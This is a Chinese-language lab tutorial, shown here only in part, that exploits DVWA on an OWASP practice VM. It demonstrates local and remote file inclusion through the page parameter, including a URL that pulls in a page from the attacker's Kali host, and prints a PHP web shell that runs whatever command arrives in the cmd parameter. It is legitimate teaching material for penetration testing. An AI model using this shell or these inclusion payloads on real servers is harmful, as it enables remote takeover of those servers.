文章目录
- 前言
- 一、寻找文件包含漏洞
- 二、文件包含和文件上传
-
- 环境准备
- 文件包含和文件上传案例
-
- 1.在Upload页面的上传点上传webshell.php文件
- 2.为了绕过上传限制,需要打开Burp suite 。先在浏览器的设置中打开手动网络代理,再打开Burp Suite,并打开 Burp Suite 的拦截开关
- 3.重新选中webshell.php文件进行上传
- 4.点击上传之后,Burp Suite那边的数据包就会拦截下来
- 5.将第二个 Content-Type 中的值修改为 image/jpeg 后再放行请求包,然后就会看到上传成功的信息,记下提示的路径
- 6.上传成功后,要使用上传的 webshell.php 来对服务器执行命令。转到 DVWA的 File Inclusion 页面
- 7.将page的值改为之前记下的路径
- 8.webshlee.php被成功加载
- 三、手动识别SQL注入
- 总结
前言
在计算机安全领域,漏洞注入是一种常见的攻击技术,它利用软件漏洞或安全漏洞来攻击计算机系统。漏洞注入可以用于窃取数据、获取系统权限、破坏系统等各种恶意行为。为了保护计算机系统的安全,渗透测试和漏洞注入已经成为一个必不可少的领域。
本文将介绍漏洞注入的基本原理和方法,使用漏洞注入进行攻击的常见技术和工具,以及如何使用漏洞注入来防范攻击。此外,本文还提供了一系列实用的漏洞注入示例,以帮助读者更好地理解和应用这些技术。
无论您是一名网络安全专业人员还是一个普通用户,理解漏洞注入的原理和方法都非常重要。本文将深入探讨漏洞注入技术,以帮助您更好地理解和保护计算机系统的安全。
一、寻找文件包含漏洞
环境准备
1.开启OWASP靶机和Kali虚拟机
开启OWASP靶机
开启Kali虚拟机
2.kali中登陆dvwa(用户名和密码都是 admin),进入 File Inclusion 页面
在Kali中登录dvwa,进入File Inclusion页面
寻找文件包含漏洞案例
1.File Inclusion 页面提示要测试包含的内容,将浏览器的URL中的page改为index.php进行尝试
在File Inclusion页面提示要测试包含的内容,将浏览器的URL中的page改为index.php进行尝试
2.为了尝试攻击,需要知道存在本地的文件名称,知道有个 index.php 在根目录下,所以尝试下目录遍历和文件包含。提交参数为…/…/index.php,可以证明存在文件包含漏洞了(“…/”表示返回上一级目录)
现在我们将浏览器的URL中的page改为…/…/index.php进行尝试
3.下面尝试一下远程文件包含漏洞。首先在Kali启动 apache 服务器:service apache2 start
在Kali虚拟机中启动Apache服务器,命令如下:
service apache2 start
4.现在利用这个文件包含漏洞,包含一下 Kali 的 apache 页面
在浏览器的URL中输入以下命令:
http://192.168.137.138/dvwa/vulnerabilities/fi/?page=http://192.168.137.167/index.html
得到结果
二、文件包含和文件上传
环境准备
1.开启OWASP靶机和Kali虚拟机
开启OWASP靶机
开启Kali虚拟机
2.在kali的/root/Document路径下,创建webshell.php文件
在Kali的/root/Document路径下,创建webshell.php文件,内容如下:
<?
system($_GET['cmd']);
echo 'Type a command:<form method="get"
action="../../hackable/uploads/webshell.php"><input
type="text" name="cmd"/></form>';
?>